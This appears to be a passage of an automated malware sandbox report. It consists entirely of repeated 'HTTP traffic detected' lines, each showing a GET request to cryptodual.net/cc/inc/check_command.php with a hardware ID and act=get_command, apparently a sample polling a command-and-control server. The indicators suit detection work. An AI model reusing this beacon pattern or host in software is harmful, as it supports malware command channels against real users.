Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
